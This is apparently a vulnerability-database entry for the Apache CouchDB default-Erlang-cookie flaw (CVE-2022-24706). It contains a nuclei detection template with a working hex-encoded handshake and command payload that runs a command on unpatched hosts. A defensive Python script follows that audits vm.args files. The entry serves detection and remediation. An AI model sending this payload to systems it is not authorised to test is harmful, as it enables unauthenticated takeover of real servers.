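Vulnerability information
Vulnerability name: Apache CouchDB Erlang Distribution - Remote Command Execution Vulnerability
Vulnerability ID:
Vulnerability type: Command execution
Severity: Critical
Description: Apache CouchDB is an open-source NoSQL database focused on ease of use and on being "a database that completely embraces the web". It is a document-oriented database that stores data as JSON and is operated through an HTTP API. CouchDB is widely used in web applications and enterprise services, and developers favor it for its distributed nature and ease of scaling. The vulnerability exists in Apache CouchDB versions before 3.2.2: because the default installation is improperly configured, an attacker can access the system without authenticating and gain administrator privileges. The technical root cause is that the Erlang cookie CouchDB uses by default has the value "monster"; this hard-coded credential lets an attacker bypass the authentication mechanism and execute remote commands. Exploitation can give the attacker full control of the affected system and arbitrary code execution, which in turn can lead to data disclosure, service disruption or other malicious activity. Because the attack requires no authentication and can be automated, the security risk of this vulnerability is extremely high.
Vendor: Apache
Product: CouchDB
Affected versions: version < 3.2.2
Search syntax: product:"CouchDB" OR product:"couchdb" OR cpe:"cpe:2.3:a:apache:couchdb"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2022%2FCVE-2022-24706.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details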
id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x, NaN-KoreLogic
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    epss-score: 0.94412
    epss-percentile: 0.99975
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"CouchDB"
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp

variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      # Send the node name message that opens the distribution handshake.
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      # Read the challenge sent back by the target node.
      - read: 1024
        name: challenge
      # Reply with the MD5 digest of the cookie and the challenge value.
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # Send the command message and read the response.
      - data: "{{cmd}}"
        type: hex
        read: 1024
    # The check matches only if all three words appear in the response.
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
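The description and remediation above come down to one setting, the Erlang cookie. The following audit of a CouchDB vm.args file is an added example, not part of the nuclei template or of CouchDB. It flags the default cookie and, going slightly beyond the text, also reports where the distribution port listens. The function names and the sample file are constructed for illustration; the findings about `inet_dist_use_interface` and `~/.erlang.cookie` rest on standard Erlang behavior rather than on this page.

```python
import shlex

DEFAULT_COOKIE = "monster"  # default cookie value named in the description above
LOOPBACK = ("{127,0,0,1}", "{0,0,0,0,0,0,0,1}")

# Constructed sample, not taken from a real host.
SAMPLE_VM_ARGS = """\
# constructed vm.args
-name couchdb@127.0.0.1
-setcookie monster
-kernel inet_dist_listen_min 9100 inet_dist_listen_max 9200
"""

def parse_vm_args(text):
    """Map each emulator flag to the list of its argument lists."""
    flags = {}
    for raw in text.splitlines():
        try:
            tokens = shlex.split(raw, comments=True)  # '#' starts a comment
        except ValueError:                            # unbalanced quote
            tokens = raw.split()
        if tokens and tokens[0].startswith("-"):
            flags.setdefault(tokens[0], []).append(tokens[1:])
    return flags

def audit_vm_args(text):
    """Return (severity, message) findings for one vm.args file."""
    flags = parse_vm_args(text)
    findings = []
    cookies = [args[0] for args in flags.get("-setcookie", []) if args]
    if DEFAULT_COOKIE in cookies:
        findings.append(("critical", "Erlang cookie is the default 'monster'"))
    elif not cookies:
        findings.append(("info", "no -setcookie: audit ~/.erlang.cookie of the "
                                 "account that runs CouchDB instead"))
    kernel = {}
    for args in flags.get("-kernel", []):
        kernel.update(zip(args[0::2], args[1::2]))    # key/value pairs
    iface = kernel.get("inet_dist_use_interface")
    if iface is None:
        findings.append(("warning", "inet_dist_use_interface unset: Erlang "
                                    "distribution listens on all interfaces"))
    elif iface.replace(" ", "") not in LOOPBACK:
        findings.append(("warning", f"distribution bound to {iface}: restrict "
                                    "it to cluster peers with a firewall"))
    return findings

if __name__ == "__main__":
    for severity, message in audit_vm_args(SAMPLE_VM_ARGS):
        print(f"{severity}: {message}")
```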